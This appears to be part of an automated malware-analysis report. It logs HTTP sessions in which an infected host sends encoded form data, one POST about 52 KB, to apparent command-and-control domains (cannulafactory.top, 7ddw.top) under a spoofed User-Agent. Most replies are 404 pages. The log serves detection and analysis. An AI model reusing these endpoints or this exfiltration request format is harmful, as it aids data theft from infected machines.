                                                Aug 27, 2024 08:04:46.449721098 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:04:46.449842930 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:04:46.449934959 CEST277INData Raw: 3d 22 33 32 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 68 61 74 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                80192.168.11.204992218.183.3.4580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:48.987231970 CEST2578OUTPOST /y82c/ HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cannulafactory.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cannulafactory.top/y82c/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 68 4a 4b 35 59 31 70 36 7a 72 79 63 63 6d 54 56 78 49 4d 77 79 6b 72 44 31 72 7a 51 47 46 65 66 51 4c 6c 67 38 2f 69 6f 2b 79 55 6b 56 6a 6e 55 61 56 78 4b 6b 50 77 32 4e 7a 33 6d 56 38 65 38 55 2b 74 4c 43 30 4a 38 68 42 58 57 4d 4c 4f 61 6e 56 45 50 46 35 39 5a 2f 42 51 35 6e 31 59 65 4d 48 30 67 51 33 49 6c 47 78 39 58 39 53 6e 58 53 50 4f 75 39 4e 50 32 6d 30 56 43 46 6d 73 74 62 57 71 4f 58 4a 2b 52 30 6d 67 38 55 4a 48 71 41 52 4f 63 48 71 57 51 6e 4b 4a 68 62 31 46 4c 55 7a 45 54 76 51 6f 4e 78 30 54 2f 58 66 4d 35 4e 37 74 6d 78 33 72 6e 30 59 38 47 76 32 2f 78 5a 45 30 33 34 4f 4f 4a 7a 61 6f 6a 4f 75 4a 4b 52 69 76 45 36 63 4b 32 51 52 57 67 65 35 4f 53 70 43 30 6f 57 5a 30 4a 38 57 62 68 48 39 63 6c 31 51 63 61 48 69 64 49 2f 30 41 30 4d 32 43 71 66 50 6d 4b 31 50 44 51 34 45 64 36 45 30 50 37 4c 6b 36 72 57 7a 57 4e 75 31 47 51 6c 6b 49 41 68 75 70 4d 74 34 77 73 2b 53 53 6c 73 52 6a 4b 4d 66 4d 4c 71 44 68 75 72 71 70 64 61 73 6f 4c 34 46 50 49 49 64 61 68 51 34 [TRUNCATED]
                                                Data Ascii: ij60MtY=hJK5Y1p6zryccmTVxIMwykrD1rzQGFefQLlg8/io+yUkVjnUaVxKkPw2Nz3mV8e8U+tLC0J8hBXWMLOanVEPF59Z/BQ5n1YeMH0gQ3IlGx9X9SnXSPOu9NP2m0VCFmstbWqOXJ+R0mg8UJHqAROcHqWQnKJhb1FLUzETvQoNx0T/XfM5N7tmx3rn0Y8Gv2/xZE034OOJzaojOuJKRivE6cK2QRWge5OSpC0oWZ0J8WbhH9cl1QcaHidI/0A0M2CqfPmK1PDQ4Ed6E0P7Lk6rWzWNu1GQlkIAhupMt4ws+SSlsRjKMfMLqDhurqpdasoL4FPIIdahQ4fLNOxRw6/LkWBkuuE16M3VPhO2X7P9GKxCInBi5laqL6bg79qVHi2IudP/8wJjj8IBuf8qm914HMSn5KovaiTWd+/2mTvJ1qmho5zlO1ZMgAQpdqr6KKjfP7cYZSxTiVFMJz5osv7j4iYXVH0jy3iKjhBYLewIVa1qrEqXK7Tis8hntsZWd+qIWSQaBfKakAb5zS+cbzYfHSQT37mxDZ0A0pFOON7CBWWIyjj/Z/8jY0IHbSuYgR6nYBYWb3WSh6S3xSl4fZwirobYWNDnZmKUjztnA3084QMiVfwPypxn0YdaEWx+OHrSJWrkFFz7DeMLduf+Dm2Qq5SQqmDlIRwu1MJFKX8Wu+Gmcv4n2TYA7qq7Cwx6J0Yr0fVs2niO8p3yjvvU9MVt8gdwXjbqkGeEyR5iJVNxt7SL/9Y+qIS6O4wtQ2yo5pzJcHzpnkBzuqGE3id7+5Bdoce1OKcv4Lbjxa8g9nS1NGGTRjupr67kEIsjE+AlXzLOvTEJ5a3CumaeTz7RPFS0ufHJ1pOMkCdJpSTt6/3IZTF4mr5nYfakkwfbseWZ7q2mlln1Q8SiCsslh1DrAn0vZBnPftZQygWvsD7Ooua/rfUCYNiwkNVs3Do/K87KAX6QMfkg7vLAkKspSODklTVXaGsXrP/RQxAhNwIkqqUecGpQ [TRUNCATED]
                                                Aug 27, 2024 08:04:48.987271070 CEST3867OUTData Raw: 4c 42 51 4a 31 6d 69 52 35 55 43 54 45 71 4e 50 69 49 45 73 77 4f 52 33 45 30 76 52 56 37 41 6a 57 65 2f 7a 6d 65 35 6a 6a 77 66 38 79 42 6e 6c 2f 4f 57 46 35 64 50 72 43 6f 6a 45 69 5a 4d 67 58 55 65 36 71 32 37 4e 36 5a 33 54 4c 57 66 57 30 63
                                                Data Ascii: LBQJ1miR5UCTEqNPiIEswOR3E0vRV7AjWe/zme5jjwf8yBnl/OWF5dPrCojEiZMgXUe6q27N6Z3TLWfW0c5T9WwDZiI83QJzdUpxmwg1pFVhVuBaeJ9gtNMFKNyClGSFx0UnBe1NN27Enl/pxu5j2DFp9IhxvIp/FJkvFNSVgEHijxKgOg5RWaWlMOla2ojU4HY+v3AYZKKQUk3kSJ/0q2cmMPmLOVYWgArc4pKRIBnGP82dG69
                                                Aug 27, 2024 08:04:48.987344980 CEST6445OUTData Raw: 4f 76 39 5a 62 6c 43 72 72 62 47 64 64 47 4d 64 51 33 75 32 5a 31 41 38 42 4a 47 76 49 63 49 65 4e 66 49 53 2b 79 4d 4b 67 72 34 42 31 30 55 6f 36 4e 78 4a 68 63 6e 66 5a 7a 41 77 5a 2b 51 53 74 55 77 6e 4f 6c 46 35 33 34 31 53 70 30 71 51 4e 2f
                                                Data Ascii: Ov9ZblCrrbGddGMdQ3u2Z1A8BJGvIcIeNfIS+yMKgr4B10Uo6NxJhcnfZzAwZ+QStUwnOlF5341Sp0qQN/qRXBYdnSWh9VW1GZ6cu+XnaQeRSSdQZbrxueyxL6Yl1votykIzPnd81ZUbxazO4MG8yJKDVh0mW/0NTfqgdFgczFe61+sBY/SWCz1rAdEk1NhVhUdRNJ5PPtYVb5H9bErjudX+hOctaF3RG4fK2bQGTRa5XEkWzFC
                                                Aug 27, 2024 08:04:49.253905058 CEST1289OUTData Raw: 61 4d 4a 4a 65 51 4f 65 4f 54 44 47 75 32 55 34 31 36 7a 32 6d 35 78 58 42 61 6b 73 72 4c 39 4d 33 46 70 30 5a 5a 30 6f 58 67 71 79 75 36 76 58 2b 62 55 74 53 53 70 4c 41 64 64 63 6a 6c 62 69 4b 42 49 50 69 2f 61 32 47 59 4c 38 6b 69 30 6d 57 58
                                                Data Ascii: aMJJeQOeOTDGu2U416z2m5xXBaksrL9M3Fp0ZZ0oXgqyu6vX+bUtSSpLAddcjlbiKBIPi/a2GYL8ki0mWX5RIhWQRqVso5OgtenowXxjAXQgTUfjU2FLxN0FmyX+gkjnu63ZH45vUhTLCdY0/fAlHJYVk0VSxs25chTrjaPEEjUoDzmgdPJ5LjCoBvDr1QZGof7S24u1/bq0AfFKZemK/3HHgq2GplG2gmy0woquJXlEP/USKsV
                                                Aug 27, 2024 08:04:49.254020929 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:49 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 08:04:49.254106998 CEST9023OUTData Raw: 79 6c 64 51 45 65 71 56 52 51 54 2f 4e 58 6b 64 43 77 64 56 4d 70 57 57 74 52 39 37 61 6c 32 68 54 49 74 38 64 62 30 6e 67 54 34 76 59 48 59 62 61 75 4c 71 79 47 31 4a 78 4e 74 76 39 78 43 74 70 70 43 56 51 64 6b 37 42 6e 62 51 5a 34 71 64 6e 34
                                                Data Ascii: yldQEeqVRQT/NXkdCwdVMpWWtR97al2hTIt8db0ngT4vYHYbauLqyG1JxNtv9xCtppCVQdk7BnbQZ4qdn4JFqoHqUG0D8Esrn7UdVpwE3+HgwpwjSdhHFm1yqkLadvwTt/VcRL4hkRILSFppWvHf0cp+epWT0Mll0KfvnuXI31umf0Nos3DyNLADkfZGBK/eqcVu5TDp+qtTd1p8XzZF6J7kernjI4dpAGeszULSA5hxuOXWguh
                                                Aug 27, 2024 08:04:49.254168034 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:04:49.254268885 CEST2578OUTData Raw: 73 44 49 56 6a 4f 45 56 4a 6d 63 4c 51 6a 74 5a 45 44 78 4d 6c 45 4f 44 71 52 31 64 79 57 69 2b 31 73 39 67 57 33 37 70 61 77 47 45 72 76 34 31 4d 4f 32 4b 5a 50 2b 66 64 35 47 35 71 58 73 48 53 6e 7a 53 45 6e 7a 4c 50 45 55 48 43 64 2f 74 6b 64
                                                Data Ascii: sDIVjOEVJmcLQjtZEDxMlEODqR1dyWi+1s9gW37pawGErv41MO2KZP+fd5G5qXsHSnzSEnzLPEUHCd/tkdpVhqUwzxeqI1yEnjtEtKY6vjxlQJLKB4Gj4z/de4oF+QkBL7YPCfgHdfUhRRmpCYER7EaV2HqE2AHEowT0cHt1bLIngCN/P7iroxyj4o5R1C1a/l+5R7WNlVTMQCfic5xF86ZDxY65fjV2O4CAwneiP1w2xFiiQd4
                                                Aug 27, 2024 08:04:49.254292011 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:04:49.254606962 CEST10312OUTData Raw: 77 67 2b 79 44 41 76 58 6d 48 62 34 45 38 6a 61 33 2b 33 52 52 6d 43 4e 74 36 62 31 75 51 51 77 44 61 4d 69 58 4f 4d 7a 41 4a 4b 31 78 42 4f 58 62 47 74 6c 49 2f 74 55 42 78 2b 36 5a 4c 58 39 63 2b 72 6c 6e 39 46 56 53 73 58 43 49 5a 30 33 45 42
                                                Data Ascii: wg+yDAvXmHb4E8ja3+3RRmCNt6b1uQQwDaMiXOMzAJK1xBOXbGtlI/tUBx+6ZLX9c+rln9FVSsXCIZ03EB6Ng06vyFPsioX9r4AIdRpBYgH5SESJV1gq+9JLkzFGmF/Qgxq17wguOql+6AvO2vbxBzXgMNc+9+zDa5djwK/AuybMk+UrNzhHhcAMsT/iHqTonyFzW/7X1XZS+/AB8ZogzmTrOq7LRX85wpXB5dobtmEw7YpR9Qg
                                                Aug 27, 2024 08:04:49.295052052 CEST1289OUTData Raw: 36 58 35 4e 53 32 4f 52 44 33 4b 2b 75 62 6e 30 56 72 39 32 57 37 32 6e 53 59 69 36 69 4b 61 41 7a 44 36 74 69 77 49 74 51 57 43 6d 31 46 32 35 79 56 4e 39 4e 79 62 63 6c 2f 4b 47 4e 68 63 32 78 4b 74 38 45 65 6f 39 54 6d 61 67 47 53 59 69 42 6f
                                                Data Ascii: 6X5NS2ORD3K+ubn0Vr92W72nSYi6iKaAzD6tiwItQWCm1F25yVN9Nybcl/KGNhc2xKt8Eeo9TmagGSYiBotsLZ4cErm8w18e/jZoaUXote2QlIUmSqe6B58RZthanJPCE4jLnXN1Oeb6P+NCHNr14VpU0qxhqsYdJ5sla2Y0JWl5jcHNF9B1pHTZxu/Pl1E8zMwssfjRX+5U1w2iAX0jD6kh2KYZnQG9eYE178Ldvfnt4RpKvhm
                                                Aug 27, 2024 08:04:49.295202971 CEST1289OUTData Raw: 6d 30 39 7a 50 6f 5a 49 44 2b 37 72 4c 32 74 58 5a 44 4f 4f 70 30 6c 56 56 72 65 59 4c 78 72 72 51 76 78 58 4b 69 54 2b 61 6e 70 4a 77 77 62 69 75 45 34 2f 68 5a 64 63 42 50 73 68 64 43 4a 65 46 48 66 49 4f 6a 65 6a 74 65 4e 59 56 4a 54 37 6e 72
                                                Data Ascii: m09zPoZID+7rL2tXZDOOp0lVVreYLxrrQvxXKiT+anpJwwbiuE4/hZdcBPshdCJeFHfIOjejteNYVJT7nrFS5JcwytinL+FXrKWvhHAWsBqwEqmQS7jqkzl0LrdxOyqkgkHPJ+etBgRBG3zG12l+iE2a8dE58/SwjL4OehRawnwegWNYOCcgzRqa+k1H0R2nFPQ+AJdOxeBIFHKQV3diuv/dPHCYZSPxaBbaZHJG9Z+HphpxdCw


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                81192.168.11.204992318.183.3.4580
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:51.780174017 CEST552OUTGET /y82c/?wXB=brv4Erb&ij60MtY=sLiZbFdk0bb3LADauL00iEPz4ezLfDKRfqlDl/6kvE4DPkuqbR8aqfEySQ7vKfLRZ5tGFHhzrS3SF8murk9fEOV453YSzWktCGZAKUV3HiBT9SXvdO/vw9M= HTTP/1.1
                                                Host: www.cannulafactory.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Aug 27, 2024 08:04:52.048980951 CEST1289INHTTP/1.1 404 Not Found
                                                Server: nginx/1.20.1
                                                Date: Tue, 27 Aug 2024 06:04:51 GMT
                                                Content-Type: text/html
                                                Content-Length: 3971
                                                Connection: close
                                                ETag: "6526681e-f83"
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 31 2f 44 54 44 2f 78 68 74 6d 6c 31 31 2e 64 74 64 22 3e 0a 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 54 68 65 20 70 61 67 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 2f 2a 3c [TRUNCATED]
                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head> <title>The page is not found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /> <style type="text/css"> /*<![CDATA[*/ body { background-color: #fff; color: #000; font-size: 0.9em; font-family: sans-serif,helvetica; margin: 0; padding: 0; } :link { color: #c00; } :visited { color: #c00; } a:hover { color: #f50; } h1 { text-align: center; margin: 0; padding: 0.6em 2em 0.4em; background-color: #900; color: #fff; font-weight: normal; [TRUNCATED]
                                                Aug 27, 2024 08:04:52.049109936 CEST1289INData Raw: 20 20 20 20 20 68 31 20 73 74 72 6f 6e 67 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 35
                                                Data Ascii: h1 strong { font-weight: bold; font-size: 1.5em; } h2 { text-align: center; background-color: #900; font-size: 1.1em;
                                                Aug 27, 2024 08:04:52.049124002 CEST1289INData Raw: 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 68 33 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 3e 57 65 62 73 69 74 65 20 41
                                                Data Ascii: is not found.</h3> <div class="alert"> <h2>Website Administrator</h2> <div class="content"> <p>Something has triggered missing webpage on your website. This
                                                Aug 27, 2024 08:04:52.049134970 CEST277INData Raw: 3d 22 33 32 22 20 2f 3e 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 72 65 64 68 61 74 2e 63 6f 6d 2f 22 3e 3c 69 6d 67 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                Data Ascii: ="32" /></a> <a href="http://www.redhat.com/"><img src="poweredby.png" alt="[ Powered by Red Hat Enterprise Linux ]" width="88" height="31" /></a> </div>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                82192.168.11.2049924154.23.184.20780
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:04:57.916975021 CEST802OUTPOST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4c 73 54 74 53 38 42 30 4a 43 75 56 68 54 54 38 4c 79 75 42 4c 2b 4c 32 51 75 46 31 69 64 77 4d 68 31 57 57 54 70 7a 5a 49 59 64 68 77 41 46 67 66 43 34 76 73 63 6d 63 59 59 65 7a 78 6b 79 4f 6b 76 32 6a 6d 53 77 6d 41 6b 4a 37 2b 44 52 38 41 59 38 6c 2f 6f 65 49 2f 4e 56 62 35 34 69 50 43 37 79 6e 48 2f 78 41 47 48 49 56 46 74 61 6e 49 48 56 39 6e 46 50 4c 45 34 71 44 30 6a 42 65 7a 69 32 45 68 51 69 46 31 46 36 4f 6a 7a 38 42 30 74 37 50 46 50 7a 75 45 4d 43 4e 57 53 65 39 37 59 69 68 53 55 75 54 59 7a 7a 78 31 35 46 5a 37 67 5a 45 47 67 3d 3d
                                                Data Ascii: ij60MtY=FpNaodwtk1yjLsTtS8B0JCuVhTT8LyuBL+L2QuF1idwMh1WWTpzZIYdhwAFgfC4vscmcYYezxkyOkv2jmSwmAkJ7+DR8AY8l/oeI/NVb54iPC7ynH/xAGHIVFtanIHV9nFPLE4qD0jBezi2EhQiF1F6Ojz8B0t7PFPzuEMCNWSe97YihSUuTYzzx15FZ7gZEGg==
                                                Aug 27, 2024 08:04:58.240266085 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:04:58 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
                                                Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                83192.168.11.2049925154.23.184.20780
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 08:05:00.754173040 CEST1142OUTPOST /pcjw/ HTTP/1.1
                                                Host: www.7ddw.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.7ddw.top
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.7ddw.top/pcjw/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 46 70 4e 61 6f 64 77 74 6b 31 79 6a 4e 4e 6a 74 56 66 35 30 46 79 75 53 6b 54 54 38 65 43 75 4e 4c 2b 48 32 51 76 78 6c 68 75 55 4d 69 51 36 57 55 74 6e 5a 42 49 64 68 6f 51 46 6c 41 79 34 6d 73 63 71 2b 59 61 61 7a 78 6c 53 4f 6b 63 2b 6a 69 53 77 70 55 30 4a 30 70 7a 52 2f 45 59 38 56 2f 6f 62 62 2f 4d 42 62 36 49 4f 50 4d 65 6d 6e 51 36 4e 48 43 6e 49 58 52 64 61 6b 52 58 56 2f 6e 46 44 44 45 34 54 34 7a 53 46 65 7a 43 57 45 7a 67 69 47 73 46 36 4a 37 7a 39 68 6b 76 61 2f 49 63 44 54 4d 38 75 72 55 33 4f 55 33 70 43 47 4c 6d 75 33 42 77 75 42 35 37 67 4c 79 69 34 66 56 76 57 34 77 62 73 4f 78 48 65 4a 41 6e 57 64 58 34 4f 33 71 4c 58 4a 2b 4f 36 6a 74 62 63 2b 62 71 6b 4a 41 67 4d 41 45 62 4c 61 6a 52 4b 48 63 2b 58 59 2b 54 57 49 39 53 31 68 39 61 70 66 7a 57 51 54 69 39 6f 48 79 34 72 77 64 2b 48 4e 63 50 6c 31 42 59 51 48 68 4f 74 47 7a 4f 67 73 46 66 30 6a 6b 46 7a 65 56 6c 2f 32 6b 50 31 70 7a 64 6a 41 7a 4d 58 43 46 4b 6e 37 64 4b 7a 71 50 6a 54 55 77 46 41 44 50 63 [TRUNCATED]
                                                Data Ascii: ij60MtY=FpNaodwtk1yjNNjtVf50FyuSkTT8eCuNL+H2QvxlhuUMiQ6WUtnZBIdhoQFlAy4mscq+YaazxlSOkc+jiSwpU0J0pzR/EY8V/obb/MBb6IOPMemnQ6NHCnIXRdakRXV/nFDDE4T4zSFezCWEzgiGsF6J7z9hkva/IcDTM8urU3OU3pCGLmu3BwuB57gLyi4fVvW4wbsOxHeJAnWdX4O3qLXJ+O6jtbc+bqkJAgMAEbLajRKHc+XY+TWI9S1h9apfzWQTi9oHy4rwd+HNcPl1BYQHhOtGzOgsFf0jkFzeVl/2kP1pzdjAzMXCFKn7dKzqPjTUwFADPclK2hxCybaHodRUVRAcyLVcC5oV/JMunGco0HNo8BXttaQauxw8ss2Pohtyxv+q1sEdQyUtrLqxN6ElFQJa0SHOcN8mWucZdCEEbBIxtYipwHiGYiW/8JFW3DdYrQLuqxS1F4+JFylvDg379RN9zEYZAiGGTBasho54U1kauWV6i0c4HaXEWgCGmIzZ8m3WDfzQ218k3LVBY8A=
                                                Aug 27, 2024 08:05:01.056082964 CEST312INHTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Tue, 27 Aug 2024 06:05:00 GMT
                                                Content-Type: text/html
                                                Content-Length: 148
                                                Connection: close
                                                ETag: "66a62378-94"
